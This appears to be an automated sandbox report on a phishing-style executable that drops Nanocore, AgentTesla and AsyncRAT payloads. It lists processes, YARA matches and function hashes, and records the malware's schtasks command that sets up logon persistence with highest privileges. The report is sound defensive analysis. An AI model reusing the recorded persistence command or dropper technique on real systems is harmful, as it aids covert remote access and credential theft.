Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.234335225.0000000003011000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: Consignment Document PL&BL Draft.exe PID: 6796 Parent PID: 6620

General

Start time:	09:31:15
Start date:	03/12/2020
Path:	C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0xc70000
File size:	700416 bytes
MD5 hash:	B70FFEB2BABBACB28B22411BECCB4642
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: Rczgwoxvqzh.exe PID: 6872 Parent PID: 6796

General

Start time:	09:31:17
Start date:	03/12/2020
Path:	C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe'
Imagebase:	0xc00000
File size:	128000 bytes
MD5 hash:	01475371C9519A0C8F64B7606A0833E0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.245444705.0000000012EA1000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 76%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: Icda.exe PID: 6888 Parent PID: 6796

General

Start time:	09:31:18
Start date:	03/12/2020
Path:	C:\Users\user\AppData\Local\Temp\Icda.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\Icda.exe'
Imagebase:	0xa40000
File size:	207360 bytes
MD5 hash:	BB21F995740D8BC1549D9CBC32874DD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.492629287.0000000004167000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000003.00000002.492629287.0000000004167000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.493993810.00000000056D0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.493993810.00000000056D0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\Icda.exe, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\Icda.exe, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\AppData\Local\Temp\Icda.exe, Author: Joe Security Rule: NanoCore, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Icda.exe, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 94%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: Isgeprf.exe PID: 6976 Parent PID: 6872

General

Start time:	09:31:20
Start date:	03/12/2020
Path:	C:\Users\user\AppData\Local\Temp\Isgeprf.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\Isgeprf.exe'
Imagebase:	0x710000
File size:	46080 bytes
MD5 hash:	E2DA4F42475E01F7961EF2FB929DE54E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000000.242716308.0000000000712000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.263991887.0000000002BB2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.263102745.0000000000712000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 86%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: Fdquqwatjjr.exe PID: 7032 Parent PID: 6872

General

Start time:	09:31:20
Start date:	03/12/2020
Path:	C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe'
Imagebase:	0x4e0000
File size:	219648 bytes
MD5 hash:	E8DC83A4ED7657D3211077B7F343FC3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.243567239.00000000004E2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.483921714.00000000004E2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 67%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 4420 Parent PID: 6976

General

Start time:	09:31:29
Start date:	03/12/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn 'VLC2' /tr ''C:\Users\user\AppData\Local\Temp\VLC2.exe'' & exit
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6308 Parent PID: 4420

General

Start time:	09:31:29
Start date:	03/12/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6316 Parent PID: 6976

General

Start time:	09:31:29
Start date:	03/12/2020
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmpA04.tmp.bat''
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6276 Parent PID: 6316

General

Start time:	09:31:29
Start date:	03/12/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 6340 Parent PID: 4420

General

Start time:	09:31:30
Start date:	03/12/2020
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /sc onlogon /rl highest /tn 'VLC2' /tr ''C:\Users\user\AppData\Local\Temp\VLC2.exe''
Imagebase:	0x970000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: timeout.exe PID: 2168 Parent PID: 6316

General

Start time:	09:31:30
Start date:	03/12/2020
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 3
Imagebase:	0xc50000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: VLC2.exe PID: 6008 Parent PID: 528

General

Start time:	09:31:31
Start date:	03/12/2020
Path:	C:\Users\user\AppData\Local\Temp\VLC2.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\VLC2.exe
Imagebase:	0x900000
File size:	46080 bytes
MD5 hash:	E2DA4F42475E01F7961EF2FB929DE54E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000002.483926024.0000000000902000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000000.266244520.0000000000902000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\VLC2.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 86%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: VLC2.exe PID: 6228 Parent PID: 6316

General

Start time:	09:31:33
Start date:	03/12/2020
Path:	C:\Users\user\AppData\Local\Temp\VLC2.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\VLC2.exe'
Imagebase:	0xa0000
File size:	46080 bytes
MD5 hash:	E2DA4F42475E01F7961EF2FB929DE54E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000010.00000000.271847625.00000000000A2000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000010.00000002.283204276.00000000000A2000.00000002.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: dhcpmon.exe PID: 6608 Parent PID: 3388

General

Start time:	09:31:34
Start date:	03/12/2020
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Imagebase:	0xc80000
File size:	207360 bytes
MD5 hash:	BB21F995740D8BC1549D9CBC32874DD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.292802539.0000000003331000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000011.00000002.292802539.0000000003331000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.292878095.0000000004331000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000011.00000002.292878095.0000000004331000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Joe Security Rule: NanoCore, Description: unknown, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 94%, ReversingLabs
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Consignment Document PL&BL Draft.exe PID: 6620 Parent PID: 5644 Consignment Document PL&BL Draft.exeCOMMON

Executed Functions

Function 076D0040, Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.243425511.00000000076D0000.00000040.00000001.sdmp, Offset: 076D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ce1cc175dac214c3ae66429030d577c2400d552f0119c6e1e3a16c8feaf46f7
Instruction ID: 61fb794033485d58d05b6fb0b6ad97930e51285976980d4834b2ae04ee96f64c
Opcode Fuzzy Hash: 0ce1cc175dac214c3ae66429030d577c2400d552f0119c6e1e3a16c8feaf46f7
Instruction Fuzzy Hash: 0FD1BBB1B112029FDB29EB75C954BAEB7EAAF8A300F14846DD146DB390DF34E901CB51

Uniqueness

Uniqueness Score: -1.00%

Function 015E9650, Relevance: 1.7, APIs: 1, Instructions: 195COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 015E9896

Memory Dump Source

Source File: 00000000.00000002.234186130.00000000015E0000.00000040.00000001.sdmp, Offset: 015E0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 8a70e4102e9802627aa53207de507e62acce225be39e48efd55cc90860fef120
Instruction ID: 77d2f6635e96f931d26a44f4a3585fd29eca01352414908df3b49fcc4e83f789
Opcode Fuzzy Hash: 8a70e4102e9802627aa53207de507e62acce225be39e48efd55cc90860fef120
Instruction Fuzzy Hash: 4B711570A00B058FD728DF6AD44479ABBF5FF89208F00892ED54ADBA50DB35E909CF91

Uniqueness

Uniqueness Score: -1.00%

Function 015EDC24, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 015EFDCA

Memory Dump Source

Source File: 00000000.00000002.234186130.00000000015E0000.00000040.00000001.sdmp, Offset: 015E0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 7ed4d77b3cc57b4e377bf11295317a4771cb600a43b542cf473dbe9c8dcdd78c
Instruction ID: a5495e48c28f384b1756b93a607cdcafb8543d2cd2d6c267132746da887223ae
Opcode Fuzzy Hash: 7ed4d77b3cc57b4e377bf11295317a4771cb600a43b542cf473dbe9c8dcdd78c
Instruction Fuzzy Hash: 6C51D0B1D003099FDB14CFAAC984ADEBFF5BF48314F24852AE919AB210DB719945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 015EFCAE, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 015EFDCA

Memory Dump Source

Source File: 00000000.00000002.234186130.00000000015E0000.00000040.00000001.sdmp, Offset: 015E0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 3bd4050ff47daac65b47d813fd780c88c6a404f0106d36bbc7ffc78d87d7336d
Instruction ID: 18953d7678ae075ab919c25689d554bbd0815d47a507529a7c9524a89c26fc03
Opcode Fuzzy Hash: 3bd4050ff47daac65b47d813fd780c88c6a404f0106d36bbc7ffc78d87d7336d
Instruction Fuzzy Hash: 6651E3B1D003099FDB14CF99C984ADEBFF5BF48314F24852AE819AB210DB719945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 015E5344, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 015E5401

Memory Dump Source

Source File: 00000000.00000002.234186130.00000000015E0000.00000040.00000001.sdmp, Offset: 015E0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e19e51bdccf1159ec0b3d141f8c0de91a336160deaaa5d019edb8b1173677ce2
Instruction ID: b247e9b1df7cba4ba2e0dac017486e216443231007c5f3d15dc7fcf542e9d6c2
Opcode Fuzzy Hash: e19e51bdccf1159ec0b3d141f8c0de91a336160deaaa5d019edb8b1173677ce2
Instruction Fuzzy Hash: 2B41F271D00618CFDB24CFA9C8887DEBBF5BF88308F24846AD409AB251DB74594ACF50

Uniqueness

Uniqueness Score: -1.00%

Function 015E3CAC, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 015E5401

Memory Dump Source

Source File: 00000000.00000002.234186130.00000000015E0000.00000040.00000001.sdmp, Offset: 015E0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 942ff148816ede9f9008d024d0d8cec866f0663074308126ca7d1ca0c47507d9
Instruction ID: 82bd3705b2f88be0b5ca70a450a651713c7d503b24463f476378e360304a9fbb
Opcode Fuzzy Hash: 942ff148816ede9f9008d024d0d8cec866f0663074308126ca7d1ca0c47507d9
Instruction Fuzzy Hash: 8741F371D00718CBDB24DFA9C8887DEBBF5BF58308F20846AD409AB251DB75694ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 015E95F0, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,015EB83E,?,?,?,?,?), ref: 015EB8FF

Memory Dump Source

Source File: 00000000.00000002.234186130.00000000015E0000.00000040.00000001.sdmp, Offset: 015E0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1003368edd44b52eb89df0c1a3699aa2809aecc0acbe1e8bac775ffe958de371
Instruction ID: 26e0136b7e1803793e30c89c46b42a8415ee1b7d0a2f1dbe24b8f3dd3d5035ac
Opcode Fuzzy Hash: 1003368edd44b52eb89df0c1a3699aa2809aecc0acbe1e8bac775ffe958de371
Instruction Fuzzy Hash: B921E4B5D002089FDB10CFAAD884AEEBBF4FB48324F14841AE914B7310D374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 015EB870, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,015EB83E,?,?,?,?,?), ref: 015EB8FF

Memory Dump Source

Source File: 00000000.00000002.234186130.00000000015E0000.00000040.00000001.sdmp, Offset: 015E0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5484df5650f395145bf851faf45e572eef1371017e065287d3ec58c0d2021207
Instruction ID: 9e973987040756ec31fe95e169e19325c0f5dd4bff81dffb98209871f9801f59
Opcode Fuzzy Hash: 5484df5650f395145bf851faf45e572eef1371017e065287d3ec58c0d2021207
Instruction Fuzzy Hash: 5921E3B5D002499FDB10CFA9D984ADEBBF4FB48324F14841AE954E7311D378AA45CF61

Uniqueness

Uniqueness Score: -1.00%

Function 015E9AB0, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,015E9911,00000800,00000000,00000000), ref: 015E9B22

Memory Dump Source

Source File: 00000000.00000002.234186130.00000000015E0000.00000040.00000001.sdmp, Offset: 015E0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 00f8e1b840f52bb5a3d1e9a815ad309bf89509916f3113d21bdd0e1648966e7c
Instruction ID: cc8d53d24f3ba7837bd997dac582cbf115ab91c954c2801ec5586a6fc493b5c4
Opcode Fuzzy Hash: 00f8e1b840f52bb5a3d1e9a815ad309bf89509916f3113d21bdd0e1648966e7c
Instruction Fuzzy Hash: 382124B6D04649CFDB14CFA9D448ADEFBF8BF48314F05841AD519AB600C774A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 015E9268, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,015E9911,00000800,00000000,00000000), ref: 015E9B22

Memory Dump Source

Source File: 00000000.00000002.234186130.00000000015E0000.00000040.00000001.sdmp, Offset: 015E0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 59db1f3f4e225cfc883e10d9e6cef544a8c372d1c546bf93fbf232d42abda1ec
Instruction ID: a91f83421f05b99c45db652fa943eec11f7bc1351e7fa0d24b26b6e8abde3f03
Opcode Fuzzy Hash: 59db1f3f4e225cfc883e10d9e6cef544a8c372d1c546bf93fbf232d42abda1ec
Instruction Fuzzy Hash: E11117B2D043099FDB14CF9AD448ADEFBF4FB48314F04841AD915AB600C774A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 015E9830, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 015E9896

Memory Dump Source

Source File: 00000000.00000002.234186130.00000000015E0000.00000040.00000001.sdmp, Offset: 015E0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 49c35b3d8340620828346e40692856702d3cba11d32db3959f8c33f78f3811ca
Instruction ID: 01c812894f1e06471fb885f8a661cd7c660bdddfbf014cac999326f633827ef7
Opcode Fuzzy Hash: 49c35b3d8340620828346e40692856702d3cba11d32db3959f8c33f78f3811ca
Instruction Fuzzy Hash: 291102B6C006498FDB14CF9AC448BDEFBF4EB88224F14841AD419B7610C375A546CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 015EDC5C, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,015EFEE8,?,?,?,?), ref: 015EFF5D

Memory Dump Source

Source File: 00000000.00000002.234186130.00000000015E0000.00000040.00000001.sdmp, Offset: 015E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: af91336fba85c34f3b7b3e87c4da6d2455e61fa869ee4d8651280dd749a40a15
Instruction ID: da2d43219887230ff4b3f43890fc5460523057bcd691effa21722fed8df0f9bf
Opcode Fuzzy Hash: af91336fba85c34f3b7b3e87c4da6d2455e61fa869ee4d8651280dd749a40a15
Instruction Fuzzy Hash: C91136B1D002089FDB10CF99D488BDEBBF8FB48320F10841AE929A7300C774A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 015EFEF8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,015EFEE8,?,?,?,?), ref: 015EFF5D

Memory Dump Source

Source File: 00000000.00000002.234186130.00000000015E0000.00000040.00000001.sdmp, Offset: 015E0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: c52e953d06b1f158c5aa53968ba590d811d1cb1d0f45b95a14b0bb1b0f8931b6
Instruction ID: a3ab6cd96d918f0d42cf003ee7ecda9df5887200540ff079a15c2bdc844a7e3f
Opcode Fuzzy Hash: c52e953d06b1f158c5aa53968ba590d811d1cb1d0f45b95a14b0bb1b0f8931b6
Instruction Fuzzy Hash: DF1136B59002099FDB10CF99D488BDFBBF8FB49324F10841AE968A7300C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 076D04A0, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.243425511.00000000076D0000.00000040.00000001.sdmp, Offset: 076D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59d04e21d8878edda7c323dce49d7fcb6ef4071a81fb2d223cb135d848d505a0
Instruction ID: 35a1724ac511562f3dfbfbc4d4057d4b8739c89c99fee342ba22c23bae7c0a45
Opcode Fuzzy Hash: 59d04e21d8878edda7c323dce49d7fcb6ef4071a81fb2d223cb135d848d505a0
Instruction Fuzzy Hash: 4C01AFB0D2438A9FDB25CFB9C845AAFBFF0AF09214F144599E991EB342E7309501CB91

Uniqueness

Uniqueness Score: -1.00%

Function 076D04B0, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.243425511.00000000076D0000.00000040.00000001.sdmp, Offset: 076D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eac03d2a00483f42518333f9314ae1a1affb4d4070ce91ce79dbd2697b2a86fa
Instruction ID: 8bb2d36681372d272d0bb2f9eae807575fda8d3a6ad912bc1c7ced82af98f7a7
Opcode Fuzzy Hash: eac03d2a00483f42518333f9314ae1a1affb4d4070ce91ce79dbd2697b2a86fa
Instruction Fuzzy Hash: 5CF0DAB0D1420A9FDB54DFA9D941AAEBFF4BB48200F1045A9D919E7340D7719901CF91

Uniqueness

Uniqueness Score: -1.00%

Function 076D0550, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.243425511.00000000076D0000.00000040.00000001.sdmp, Offset: 076D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b40dcbdc9e47c79372910651e74e5eb6f92dd9908eb1720278dcd00c8a00d3ca
Instruction ID: 1912e2283d599327ffaf30322cdbc20c8920126517f88d610319901b2e15f5a4
Opcode Fuzzy Hash: b40dcbdc9e47c79372910651e74e5eb6f92dd9908eb1720278dcd00c8a00d3ca
Instruction Fuzzy Hash: 09D0123615010C9E4B41EBE5ED40C527BDCAB147407809422E544C6121E621E874E791

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 015EE538, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

